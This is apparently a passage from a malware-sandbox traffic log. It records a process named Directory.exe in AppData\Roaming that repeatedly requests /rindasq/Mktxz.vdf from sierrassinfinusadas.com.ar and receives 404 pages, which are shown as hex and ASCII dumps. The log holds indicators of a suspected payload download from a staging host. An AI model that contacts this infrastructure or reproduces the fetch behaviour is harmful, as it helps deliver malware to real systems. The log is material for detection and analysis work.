                                                        2024-11-21 11:57:30 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        61192.168.2.650091167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:32 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:32 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:32 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:32 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        62192.168.2.650093167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:34 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:35 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:34 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:35 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        63192.168.2.650095167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:36 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        64192.168.2.650100167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:40 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:41 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:41 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:41 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.650103167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:44 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:44 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:44 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:44 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.650105167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:46 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:47 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:46 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:47 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.650107167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:48 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:49 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:49 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:49 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.650109167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:50 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:51 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:51 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:51 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.650112167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:53 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:54 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:54 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:54 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.650114167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:56 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:57:56 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:56 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:57:56 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.650118167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:57:59 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:00 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:57:59 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:00 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.650121167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:03 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:03 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:03 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:03 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.650123167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:05 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:06 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:05 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:06 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.650125167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:07 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:08 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:08 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
                                                        2024-11-21 11:58:08 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        75192.168.2.650127167.250.5.914436236C:\Users\user\AppData\Roaming\Directory.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-11-21 11:58:09 UTC69OUTGET /rindasq/Mktxz.vdf HTTP/1.1
                                                        Host: sierrassinfinusadas.com.ar
                                                        2024-11-21 11:58:10 UTC163INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Thu, 21 Nov 2024 11:58:10 GMT
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Content-Length: 315
                                                        Connection: close
